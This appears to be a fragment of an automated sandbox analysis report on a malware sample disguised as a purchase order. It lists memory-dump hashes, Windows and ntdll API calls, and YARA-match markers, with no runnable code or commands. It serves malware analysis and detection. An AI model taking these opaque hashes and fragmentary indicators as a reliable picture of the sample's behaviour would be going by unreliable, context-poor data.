                                                                                                        • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                                                                        • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                        • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                        • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                                                                        • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                        • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                        • Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
                                                                                                        • Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                        • Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                                        • Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
                                                                                                        • Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                                        • Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                                        • Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
                                                                                                        • Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                                        • Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                                        • Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
                                                                                                        • Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                                        • Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                                        • Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
                                                                                                        • Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                                        • Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                        • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                                                                        • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                        • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                        • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                                                                        • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                        • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                                                                        • Execute=1, xrefs: 01794713
                                                                                                        • ExecuteOptions, xrefs: 017946A0
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                        • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                                                                        • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                        • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                        • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                                                                        • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                        • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                        • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                                        • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                        • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                        • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                        • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                                        • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                        • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                        • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                        • RTL: Resource at %p, xrefs: 017972A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                        • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                                        • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                        • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                        • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                                        • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                        • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                        • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                                        • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                        • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.6%
                                                                                                        Dynamic/Decrypted Code Coverage:4.1%
                                                                                                        Signature Coverage:1.5%
                                                                                                        Total number of Nodes:461
                                                                                                        Total number of Limit Nodes:77
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 001CC7E1
• FindNextFileW.KERNELBASE(?,00000010), ref: 001CC81E
• FindClose.KERNELBASE(?), ref: 001CC829
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 234def12ba8a326379c096cd91b66ab07e415c6d1f56912ca9d283bef9ae2aeb
• Instruction ID: c84b00068d61651b06d1e0397559f37b2e0b5e6379ef41e9d6af47fa0a56f259
• Opcode Fuzzy Hash: 234def12ba8a326379c096cd91b66ab07e415c6d1f56912ca9d283bef9ae2aeb
• Instruction Fuzzy Hash: 2D318271A00308BBDB20DBA0CC86FEB777C9B54744F144559F908A7281DB70AE458BE0
APIs
• NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 001D9198
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 345e3c4e28ee16b01450e4ec299a3ed2d1f403407ed5376927da89ad629a36ae
• Instruction ID: 17897a2479f51451097c371aa43d1bd999ecc647401b36207f4011fc6bef629c
• Opcode Fuzzy Hash: 345e3c4e28ee16b01450e4ec299a3ed2d1f403407ed5376927da89ad629a36ae
• Instruction Fuzzy Hash: DE310CB5A11248AFCB14DF98D881EEFB7B8EF88310F104209F919A7340D770A941CBA0
APIs
• NtReadFile.NTDLL(?,?,?,?,?,?,?,?), ref: 001D92E3
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 6c1fb3b12d1e0b828d87ec53090c5bcc01d792e9467395cd05d1c298a7053b79
• Instruction ID: 9dc3cd487635dc998b45178bfc06360e1bfba0a541f7e11fa5e21c16472d5a9e
• Opcode Fuzzy Hash: 6c1fb3b12d1e0b828d87ec53090c5bcc01d792e9467395cd05d1c298a7053b79
• Instruction Fuzzy Hash: 85311E75A00249AFCB14DF98D881EEFB7B9EF88714F10420AFD19A7345D774A911CBA1
APIs
• NtAllocateVirtualMemory.NTDLL(?,00000004,?,00000004,00003000,?,?,?,?,?,001D803E,001C1FFB,?,?,001DB371,001D803E), ref: 001D95B2
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 53e4e2003fe044bb446b4a8e60cc4b958b6560d1b8c8cdde55729b46531f0a0d
• Instruction ID: 6062036451396a94367782ad8cb7ed32c77f6234738836477fa626deb4c04cd8
• Opcode Fuzzy Hash: 53e4e2003fe044bb446b4a8e60cc4b958b6560d1b8c8cdde55729b46531f0a0d
• Instruction Fuzzy Hash: 40213075A10249AFDB10DF98D882EEFBBB9EF98700F00411AFD15A7345D774A9118BA1
APIs
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: e8151ce01b20263e155081218890f072b6ec2f7ecda74e17849fcf141be98f00
• Instruction ID: 695aeab98789cd428aab234fc2ee6ba9df65a090521346bbfbb23febdd38597c
• Opcode Fuzzy Hash: e8151ce01b20263e155081218890f072b6ec2f7ecda74e17849fcf141be98f00
• Instruction Fuzzy Hash: B6117371A10608BFD620EBA8DC42FEF776CDF99714F40820AFA1967281D7716902C7E5
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001D93C1
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: cf3d0388c0448314c7c6c740fea77ae0746f54db5250a4da1a88c7cf2767295a
• Instruction ID: f0fabbf6cfd9d9232f78f5e57635cb4683269be892d89294c1fb29226e20debd
• Opcode Fuzzy Hash: cf3d0388c0448314c7c6c740fea77ae0746f54db5250a4da1a88c7cf2767295a
• Instruction Fuzzy Hash: B1E08C326002147BC220EA69DC01FAB776CDFC5764F918015FA0CAB241CB79F90187F4
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3f45cd21a56ab0fc78680462219ff551ae8ff6d6eb265784ac656a497ba63702
• Instruction ID: fda76d141504e19df2f40b7b4063aad153edd244d23bb1518aa65b73b7600338
• Opcode Fuzzy Hash: 3f45cd21a56ab0fc78680462219ff551ae8ff6d6eb265784ac656a497ba63702
• Instruction Fuzzy Hash: A49002616015105265407158490540A60059FF13053D5C216A0555560C8B1CD9559269
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b75e365fd12febc30f20374f8701f8af3b5381d501471b27e74ebd4345ca0693
• Instruction ID: d076c4df21f062a9cd2443b7b2a5df9af2ba9fa721f8ad95e97ed100898f737f
• Opcode Fuzzy Hash: b75e365fd12febc30f20374f8701f8af3b5381d501471b27e74ebd4345ca0693
• Instruction Fuzzy Hash: F390023160581022B5407158498554A40059FF0305B95C112E0425554C8F18DA565361
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 832f3fb456f28b37d222e6e1a4947f42b10fdb13ca30d41b5f9befb6dbd96293
• Instruction ID: cf20fdb259508009e70ba9c65c45350456d0692f42a1e5b2929b09bc6223b9f7
• Opcode Fuzzy Hash: 832f3fb456f28b37d222e6e1a4947f42b10fdb13ca30d41b5f9befb6dbd96293
• Instruction Fuzzy Hash: 4A90023120141852F50071584505B4A00058FF0305F95C117A0125654D8B19D9517521
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 11463fc454a22ae750caa938254dc69a4863c94f40692a12d75efae0f2f8c3ba
• Instruction ID: 49e84a9ad72fb4b64133c50b17ed102c62476b14c026d63878e98d191c968364
• Opcode Fuzzy Hash: 11463fc454a22ae750caa938254dc69a4863c94f40692a12d75efae0f2f8c3ba
• Instruction Fuzzy Hash: D890023120149812F5107158850574E00058FE0305F99C512A4425658D8B99D9917121
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
